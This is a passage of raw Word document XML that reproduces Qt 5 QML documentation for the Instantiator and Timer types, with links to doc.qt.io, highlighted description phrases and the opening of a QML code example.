        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="003C682E" w:rsidRDefault="00CD28D1" w:rsidP="00CD28D1">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C682E" w:rsidRPr="003C682E" w:rsidRDefault="00490E7E" w:rsidP="00605F34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1523" w:history="1">
        <w:r w:rsidR="003C682E" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="003C682E" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="003C682E" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="003C682E" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="003C682E" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="003C682E" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="003C682E" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
        <w:r w:rsidR="003C682E" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="003C682E" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="003C682E" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-5/</w:t>
        </w:r>
        <w:r w:rsidR="003C682E" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qml</w:t>
        </w:r>
        <w:r w:rsidR="003C682E" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="003C682E" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="003C682E" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="003C682E" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>instantiator</w:t>
        </w:r>
        <w:r w:rsidR="003C682E" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="003C682E" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003C682E" w:rsidRPr="00A50E12" w:rsidRDefault="003C682E" w:rsidP="00A50E12">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1239" w:name="_Toc483000789"/>
      <w:bookmarkStart w:id="1240" w:name="_Toc483003787"/>
      <w:bookmarkStart w:id="1241" w:name="_Toc483604141"/>
      <w:bookmarkStart w:id="1242" w:name="_Toc483605361"/>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Instantiator QML Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1239"/>
      <w:bookmarkEnd w:id="1240"/>
      <w:bookmarkEnd w:id="1241"/>
      <w:bookmarkEnd w:id="1242"/>
    </w:p>
    <w:p w:rsidR="003C682E" w:rsidRPr="003C682E" w:rsidRDefault="003C682E" w:rsidP="00A50E12">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1243" w:name="_Toc483000790"/>
      <w:bookmarkStart w:id="1244" w:name="_Toc483003788"/>
      <w:bookmarkStart w:id="1245" w:name="_Toc483604142"/>
      <w:bookmarkStart w:id="1246" w:name="_Toc483605362"/>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detailed Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1243"/>
      <w:bookmarkEnd w:id="1244"/>
      <w:bookmarkEnd w:id="1245"/>
      <w:bookmarkEnd w:id="1246"/>
    </w:p>
    <w:p w:rsidR="003C682E" w:rsidRPr="003C682E" w:rsidRDefault="003C682E" w:rsidP="003C682E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A Instantiator can be used </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to control the dynamic </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>creation of objects</w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or to </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dynamically create multiple objects from a template</w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F1022" w:rsidRPr="003C682E" w:rsidRDefault="003C682E" w:rsidP="003C682E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The Instantiator element </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will manage the objects it creates</w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Those objects are </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>parented</w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the Instantiator and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can also be deleted</w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the Instantiator if the Instantiator's properties change. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Objects can also be </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>destroyed dynamically through other means</w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the Instantiator </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will not recreate</w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> them unless the properties of the Instantiator change.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F1022" w:rsidRPr="002736BE" w:rsidRDefault="00490E7E" w:rsidP="00605F34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1524" w:history="1">
        <w:r w:rsidR="001F1022" w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qml-qtqml-timer.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001F1022" w:rsidRPr="00A50E12" w:rsidRDefault="001F1022" w:rsidP="00A50E12">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1247" w:name="_Toc483000791"/>
      <w:bookmarkStart w:id="1248" w:name="_Toc483003789"/>
      <w:bookmarkStart w:id="1249" w:name="_Toc483604143"/>
      <w:bookmarkStart w:id="1250" w:name="_Toc483605363"/>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Timer QML Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1247"/>
      <w:bookmarkEnd w:id="1248"/>
      <w:bookmarkEnd w:id="1249"/>
      <w:bookmarkEnd w:id="1250"/>
    </w:p>
    <w:p w:rsidR="001F1022" w:rsidRPr="001F1022" w:rsidRDefault="001F1022" w:rsidP="00A50E12">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1251" w:name="_Toc483000792"/>
      <w:bookmarkStart w:id="1252" w:name="_Toc483003790"/>
      <w:bookmarkStart w:id="1253" w:name="_Toc483604144"/>
      <w:bookmarkStart w:id="1254" w:name="_Toc483605364"/>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detailed Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1251"/>
      <w:bookmarkEnd w:id="1252"/>
      <w:bookmarkEnd w:id="1253"/>
      <w:bookmarkEnd w:id="1254"/>
    </w:p>
    <w:p w:rsidR="001F1022" w:rsidRPr="001F1022" w:rsidRDefault="001F1022" w:rsidP="001F1022">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A Timer can be used </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to trigger an action either once</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, or repeatedly at a given interval.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F1022" w:rsidRPr="001F1022" w:rsidRDefault="001F1022" w:rsidP="001F1022">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Here is a Timer that shows the current date and time, and updates the text every 500 milliseconds. It uses the JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object to access the current time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Example.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F1022" w:rsidRPr="001F1022" w:rsidRDefault="001F1022" w:rsidP="001F1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F1022">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F1022" w:rsidRPr="001F1022" w:rsidRDefault="001F1022" w:rsidP="001F1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F1022" w:rsidRPr="001F1022" w:rsidRDefault="00490E7E" w:rsidP="001F1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525" w:history="1">
        <w:r w:rsidR="001F1022" w:rsidRPr="001F1022">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001F1022" w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F1022" w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F1022" w:rsidRPr="001F1022" w:rsidRDefault="001F1022" w:rsidP="001F1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F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:hyperlink r:id="rId1526" w:history="1">
        <w:r w:rsidRPr="001F1022">
          <w:rPr>
            <w:rStyle w:val="typ"/>
